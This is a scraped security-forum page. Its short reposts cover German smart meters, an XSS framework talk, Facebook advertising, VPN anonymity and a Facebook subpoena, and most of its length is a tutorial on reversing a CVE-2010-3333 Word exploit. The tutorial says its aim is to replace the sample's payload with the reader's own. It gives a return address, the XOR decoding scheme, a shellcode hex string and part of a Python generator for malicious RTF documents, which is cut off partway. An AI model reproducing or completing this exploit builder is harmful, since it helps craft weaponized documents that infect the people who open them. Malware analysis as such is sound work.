Nytro

Smartmeter Description: SMARTMETER A technological overview of the German roll-out This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany. SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planed roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi) which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication related details of whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smartmeter

At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2 Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2 Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2

[h=1]Cum vor sa castige bani retelele sociale precum Facebook[/h] Acoperirea a milioane de consumatori (potentiali clienti) Exista numeroase moduri de a ajunge la un anumit public in marketing. Printre acestea, se numara formularea unui chestionar pentru o cunoastere consolidata a propriei clientele si a mediilor in care sa faceti publicitate produsului dumneavoastra pentru a-l vinde cel mai bine. De exemplu, daca vindeti un tractor nou pentru o ferma agricola, ii veti face publicitate intr-o revista cumparata cu predilectie de fermieri. Astfel, acoperiti un segment de piata care va asigura cel mai mare volum de vanzari. Internetul et cookie-urile Daca detin un software care analizeaza frecventa operatiunilor de cumparare de catre fermieri pentru un anumit teritoriu... de exemplu, pot lansa cookie-uri pe un site web de vanzari online de tractoare pentru a inregistra de unde provin persoanele care viziteaza site-ul, care vand sau cumpara aceste tractoare, etc.. Ti-as putea spune, daca ai recurs la serviciile mele, la ce targ agricol ar trebui sa mergi pentru a avea cele mai mari sanse sa iti vinzi tractoarele. Asta pentru ca cookie-urile mele au detectat numerosi clienti potentiali in zona respectica. Cat ai fi dispus sa platesti pentru un astfel de serviciu de marketing? Investitiile pentru gasirea unor potentiali clienti s-ar reduce enorm, intrucat nu trebuie sa angajezi o armata de vanzatori care sa prospecteze piata in ani si ani de zile. Astfel, Facebook si retelele de socializare in general utilizeaza astfel de cookie-uri, sau ar putea sa le utilizeze pentru a gasi cumparatorii (cumparatoarele) unor diverse produse, indiferent ca sunt de lux ori produse de uz zilnic. Iar intreprinderile nu ar trebui decat sa cumpere aceste liste. Astfel de liste sunt disponibile in agentii de publicitate din intreaga lume. Acestea au un pret initial care variaza in functie de piata pe care doresti sa o abordezi. Cu cat lista este mai specializata, cu atat crearea acesteia costa mai mult, si pretul de vanzare este mai mare. O lista de baza, precum nume, prenume, adresa, nr. de telefon, etc., costa aproximativ 40 de dolari pentru 1000 de clienti potentiali, in SUA. O lista cu informatii precum activitatile exercitate, orasul de resedinta, numarul de proprietati dobandite de-a lungul vietii, stilul de viata al cumparatorilor, etc., are un pret mediu de aproximativ 120 de dolari pentru 1000 de clienti potentiali, tot in SUA. In prezent, Facebook merge si mai departe, datorita cookie-urilor si a obiceiurilor de cumparare ale consumatorilor. Aceasta va permite stabilirea ca tinta precisa a milioane de persoane, cu o fiabilitate marita cu 500%, intrucat Facebook poate utiliza un program software de recunoastere a cuvintelor de pe site-ul propriu. De exemplu, programul software poate urmari toate persoanele care au folosit cuvantul Mercedes Benz in postarile lor. Facebook va putea stabili astfel o lista de marketing extrem de precisa. Si bineinteles, pretul unei astfel de liste creste. Imaginati-va ca sunteti pe Facebook, discutati cu fratele ori cu un cumnat, si spuneti la un moment dat: „Da, ma gandesc sa cumpar o masina noua, un Mercedes Benz, in vreo doua zile”. Programul software recupereaza numele dumneavoastra, numele de utilizator, orasul in care locuiti, activitatea profesionala exercitata si orice alte informatii pertinente pentru a-si da seama de la ce firma de vanzare de automobile ati putea cumpara masina. Un reprezentant Facebook va suna la respectiva firma si va conveni cu aceasta sa ii furnizeze aceste informatii contra unei sume de bani. Dumneavoastra veti primi un telefon de la firma de automobile in cauza, care va invita sa profitati de o oferta de nerefuzat… Si uite-asa avem un tip de marketing cu o tinta extrem de precisa. Iar aceasta practica va aduce un venit de miliarde de dolari retelei Facebook. O astfel de lista poate ajunge la 2500 pana chiar la mai mult de 5000 de dolari pentru 1000 de clienti potentiali, inmultit, evident, cu numarul de utilizatori de Facebook. Evident, Facebook va stabili, de asemenea, asocieri, legaturi cu alte site-uri, va recomanda membrilor cumparaturi, prin intermediul altor site-uri, si altele de acest gen (marketing indirect). Iti poti face macar o cat de mica idee de bogatia pe care o detine aceasta companie. Iar acest proces urmeaza sa fie implementat de toate retelele sociale care exista in prezent pe web. Sursa: Cum vor sa castige bani retelele sociale precum Facebook

[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h] Daca tot faceti "chestii", nu va riscati. Folositi cel putin VPN (ca cele de aici). Daca nu e ok, atunci Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/

When the cops subpoena your Facebook information, here's what Facebook sends the cops NU e noua informatia, dar mi se pare utila. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID's were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it: Gasiti aici PDF: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx

Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, providing an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and have to analyze something suspicious. When I opened the document in hex, I found something suspicious as an address in pFragment parameter and that is bc41db77; let’s search this address in debugger (77db41bc): Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it/s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available. It can be made workable on xp sp3, by taking any address from the xp sp3 dll. I took it from kernel 32.dll ‘jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it. C:/RECYCLER/server.exe does the following: • Drops a file in the system’s temp folder: vmm2.tmp • File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll • Makes registry modifications in an attempt to hijack the DHCP service The payload has the ability to: • Download additional malware • Connect and send sensitive data back to remote servers • Act as a trojan proxy server So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it. 1) In hex editor 2) In debugger Let me open sample in hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure: at eeeeeeeeeeeee After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction XOR BYTE PTR DS [EDX+ECX], 0EE Also encryption begins from last to start, that is from eeeeeeee to the start of the shell code. Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE] So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it’s time to analyze the drop dll, which has been dropped into system32 with the name of dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in c:\windows\system32 folder, as in picture, and that is going to be executed by rundll32.exe. We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with debugger. There is a process in attaching debugger. I am going to attach it with WinWord, as it is an Office document file. After attaching and before executing, we have to set a breakpoint (F2) in debugger on various win32 function. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions that are desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLIbrary, etc. After setting a breakpoint, we have to Step Over (F8 ) in debugger and while doing this we will have to look carefully for some suspicious address in the stack windows of debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function get loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel ). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address, that is, The CreateFile function gets loaded at the suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address. In the above picture, look at the stack windows. There is a call to CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438. The CreateFile function gets loaded at the suspicious address (0011f438). Note that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is start location and end location of exe/dll, and the algorithm by which exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instruction: 00115F4E AC LODS BYTE PTR DS : [ESI] 0011F54F 3C 00 CMP AL, 0 0011F551 74 06 JE SHORT 0011F559 0011F553 3C FC CMP AL, 0FC 0011F555 74 02 JE SHORT 0011F559 0011F557 34 FC XOR AL, 0FC 0011F559 AA STOS BYTE PTR ES : [EDI] 0011F55A E2 F2 LOOPD SHORT 0011F54E Let’s look at the two boldfaced instructions: 00115F4E AC LODS BYTE PTR DS : [ESI] This instruction reads the address stored at ESI and stores its value to EAX, while the instruction 0011F559 AA STOS BYTE PTR ES : [EDI] stores the value of EAX to the EDI . So the encryption algorithm is to read each byte of exe; if it is 0 or OFC then leave it as it is, if not then XOR with OFC as in the instruction 0011F557 34 FC XOR AL, 0FC So we found the encryption. The next steps is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in dump windows: There is some sequence of values with ASCII 6161616161, etc.; let’s search this value in the Hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in dump ), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file ). If MZ is found, it indicates that this is the beginning of exe. Now what is the total size of exe? For that, we have to check the file that’s dropped into c:/windows/system32 dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of exe/dll. We find the total size of dll is DLL ADD8 in hex, 44504 in decimal. So now we have found: Encryption algorithm Start Location of dll/exe End location of dll/exe Now our main job is to write the creator with proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in the mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in the system32 (dll file ). So now it’s time to write the full creator code that I have written in Python. Here is the full creator: import datetime import os header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31" "\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67" "\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64" "\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33" "\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68" "\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C" "\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C" "\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74" "\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A" "\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33" "\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D" "\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C" "\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27" "\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" "\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" "\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" "\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" 